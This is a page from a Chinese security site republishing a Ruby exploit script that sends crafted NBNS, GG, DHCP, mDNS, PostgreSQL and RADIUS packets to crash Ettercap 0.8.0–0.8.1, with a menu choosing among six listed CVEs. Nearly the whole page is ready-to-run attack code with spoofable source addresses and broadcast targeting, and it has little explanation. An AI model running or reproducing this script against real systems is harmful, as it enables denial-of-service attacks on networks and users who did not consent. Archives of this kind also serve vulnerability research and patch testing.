首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Ettercap 0.8.0-0.8.1 - Multiple Denial of Service Vulnerabilities
来源:vfocus.net 作者:Sampanis 发布时间:2014-12-22  
#Exploit Title: 6 Remote ettercap Dos exploits to 1
#Date: 19/12/2014
#Exploit Author: Nick Sampanis
#Vendor Homepage: http://ettercap.github.io
#Software Link: https://github.com/Ettercap/ettercap/archive/v0.8.1.tar.gz
#Version: 8.0-8.1
#Tested on: Linux
#CVE: CVE-2014-6395 CVE-2014-9376 CVE-2014-9377 CVE-2014-9378 CVE-2014-9379
#Make sure that you have installed packefu and pcaprub

require 'packetfu'
include PacketFu

if ARGV.count < 4
    puts "[-]Usage #{$PROGRAM_NAME} src_ip dst_ip src_mac iface"
    puts "[-]Use valid mac for your interface, if you dont know"+
        " victim's ip address use broadcast"
    exit
end

def nbns_header
    u = UDPPacket.new()
    u.eth_saddr = ARGV[2]
    u.eth_daddr = "ff:ff:ff:ff:ff:ff"
    u.ip_daddr = ARGV[1]
    u.ip_saddr = ARGV[0]
    u.udp_src = 4444
    u.udp_dst = 137
    u.payload =  "\xa0\x2c\x01\x10\x00\x01\x00\x00\x00\x00\x00\x00"
    u.payload << "\x20\x46\x48\x45\x50\x46\x43\x45\x4c\x45\x48\x46"#name
    u.payload << "\x43\x45\x50\x46\x46\x46\x41\x43\x41\x43\x41\x43"#name
    u.payload << "\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00"#name
    u.payload << "\x00\x20" #type
    u.payload << "\x00\x01" #class
    u.payload << "A"*1000 #pad
    u.recalc
    u.to_w(ARGV[3])
end
def gg_client
    u = TCPPacket.new()
    u.eth_saddr = ARGV[2]
    u.eth_daddr = "ff:ff:ff:ff:ff:ff"
    u.ip_saddr = ARGV[0]
    u.ip_daddr = ARGV[1]
    u.tcp_src = 3333
    u.tcp_dst = 8074
    u.payload = "\x15\x00\x00\x00"  #gg_type
    u.payload << "\xe8\x03\x00\x00" #gg_len
    u.payload << "A"*1000
    u.recalc
    u.to_w(ARGV[3])
end
def dhcp_header
    u = UDPPacket.new()
    u.eth_saddr = ARGV[2]
    u.eth_daddr = "ff:ff:ff:ff:ff:ff"
    u.ip_daddr = ARGV[0]
    u.ip_saddr = ARGV[1]
    u.udp_src = 67
    u.udp_dst = 4444
    u.payload =  "\x02"*236
    u.payload << "\x63\x82\x53\x63"
    u.payload << "\x35"
    u.payload << "\x00\x05\x00"
    u.payload << "\x51"
    u.payload << "\x00" #size
    u.payload << "A" * 3 #pad
    u.recalc
    u.to_w(ARGV[3])
end

def mdns_header
    u = UDPPacket.new()
    u.eth_saddr = ARGV[2]
    u.eth_daddr = "ff:ff:ff:ff:ff:ff"
    u.ip_daddr = ARGV[1]
    u.ip_saddr = ARGV[0]
    u.udp_src = 4444
    u.udp_dst = 5353
    u.payload =  "\x11\x11" #id
    u.payload << "\x00\x00" #flags
    u.payload << "\x00\x01" #questions
    u.payload << "\x00\x00" #answer_rr
    u.payload << "\x00\x00" #auth_rrs
    u.payload << "\x00\x00" #additional_rr
    u.payload << "\x06router\x05local\x00" #name
    u.payload << "\x00\x01" #type
    u.payload << "\x00\x01" #class
    u.recalc
    u.to_w(ARGV[3])
end
def mdns_dos_header
    u = UDPPacket.new()
    u.eth_saddr = ARGV[2]
    u.eth_daddr = "ff:ff:ff:ff:ff:ff"
    u.ip_daddr = ARGV[1]
    u.ip_saddr = ARGV[0]
    u.udp_src = 4444
    u.udp_dst = 5353
    u.payload =  "\x11\x11" #id
    u.payload << "\x00\x00" #flags
    u.payload << "\x00\x01" #questions
    u.payload << "\x00\x00" #answer_rr
    u.payload << "\x00\x00" #auth_rrs
    u.payload << "\x00\x00" #additional_rr
    u.payload << "\x01"
    u.payload << "\x00\x01" #type
    u.payload << "\x00\x01" #class
    u.payload << "A"*500
    u.recalc
    u.to_w(ARGV[3])
end

def pgsql_server
    u = TCPPacket.new()
    u.eth_saddr = ARGV[2]
    u.eth_daddr = "ff:ff:ff:ff:ff:ff"
    u.ip_saddr = ARGV[1]
    u.ip_daddr = ARGV[0]
    u.tcp_src = 5432
    u.tcp_dst = 3333
    u.payload = "\x52\x00\x00\x00\x08\x00\x00\x00\x03\x73\x65\x72\x02\x74\x65\x73\x74\x00\x64\x61\x74\x61\x62\x61\x73\x65\x02\x74\x65\x73\x74\x00\x63\x6c\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x4e\x49\x43\x4f\x44\x45\x00\x44\x61\x74\x65\x53\x74\x79\x6c\x65\x00\x49\x53\x4f\x00\x54\x69\x6d\x65\x5a\x6f\x6e\x65\x00\x55\x53\x2f\x50\x61\x63\x69\x66\x69\x63\x00\x00"
    u.recalc
    u.to_w(ARGV[3])
end
def pgsql_client
    u = TCPPacket.new()
    u.eth_saddr = ARGV[2]
    u.eth_daddr = "ff:ff:ff:ff:ff:ff"
    u.ip_saddr = ARGV[0]
    u.ip_daddr = ARGV[1]
    u.tcp_src = 3333
    u.tcp_dst = 5432
    u.payload = "\x70\x00\x00\x5b\x00\x03\x00\x00\x75\x73\x65\x72\x02\x74\x65\x73\x74\x00\x64\x61\x74\x61\x62\x61\x73\x65\x02\x74\x65\x73\x74\x00\x63\x6c\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x4e\x49\x43\x4f\x44\x45\x00\x44\x61\x74\x65\x53\x74\x79\x6c\x65\x00\x49\x53\x4f\x00\x54\x69\x6d\x65\x5a\x6f\x6e\x65\x00\x55\x53\x2f\x50\x61\x63\x69\x66\x69\x63\x00\x00" 
    u.recalc
    u.to_w(ARGV[3])
end

def pgsql_client_shell
    u = TCPPacket.new()
    u.eth_saddr = ARGV[2]
    u.eth_daddr = "ff:ff:ff:ff:ff:ff"
    u.ip_saddr = ARGV[0]
    u.ip_daddr = ARGV[1]
    u.tcp_src = 3333
    u.tcp_dst = 5432
    u.payload = "\x70"
    u.payload << "\x00\x00\x03\xe9" #len
    u.payload << "A"*1000
    u.payload << "\x00"
    u.recalc
    u.to_w(ARGV[3])
end

def radius_header
    u = UDPPacket.new()
    u.eth_saddr = ARGV[2]
    u.eth_daddr = "ff:ff:ff:ff:ff:ff"
    u.ip_daddr = ARGV[1]
    u.ip_saddr = ARGV[0]
    u.udp_src = 4444
    u.udp_dst = 1645
    u.payload = "\x01\x01\x00\xff\x00\x01\x00\x00\x00\x00\x00\x00\x20\x46\x48\x00\x50\x46\x43\xff\x01\x00\x48\x46\x01\x00\x50\x46\x46\x46\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00\x00\x20\x00\x01"
    u.recalc
    u.to_w(ARGV[3])
end

puts "[+]6 Remote ettercap Dos exploits to 1 by Nick Sampanis"
puts "[+]-1- nbns plugin CVE-2014-9377"
puts "[+]-2- gg dissector CVE-2014-9376"
puts "[+]-3- dhcp dissector CVE-2014-9376"
puts "[+]-4- mdns plugin CVE-2014-9378"
puts "[+]-5- postgresql dissector CVE-2014-6395(works only in 8.0)"
puts "[+]-6- radius dissector CVE-2014-9379"
print "choice:"
choice = $stdin.gets.chomp().to_i()

case choice
when 1
    puts "[+]Sending nbns packet.."
    nbns_header
when 2
    puts "[+]Sending client gg packet.."
    gg_client
when 3
    puts "[+]Sending dhcp packet.."
    dhcp_header
when 4
    puts "[+]Sending mdns packet.."
    mdns_header
    mdns_dos_header
when 5
    puts "[+]Sending pgsql packet.."
    pgsql_client
    pgsql_server
    pgsql_client_shell
when 6
    puts "[+]Sending radius packet.."
    radius_header
else
    puts "[-]Unrecognized command "
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Cacti Superlinks Plugin 1.4-2
·Varnish Cache CLI Interface Re
·Mediacoder 0.8.33 Build 5680 B
·Lotus Mail Encryption Server (
·Jaangle 0.98i.977 Denial Of Se
·NotePad++ v6.6.9 Buffer Overfl
·ProjectSend r-561 - Arbitrary
·jetAudio 8.1.3 Basic (mp3) - C
·CodeMeter 4.50.906.503 - Servi
·GParted 0.14.1 - OS Command Ex
·Avira 14.0.7.342 - (avguard.ex
·Phase botnet blind SQL injecti
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved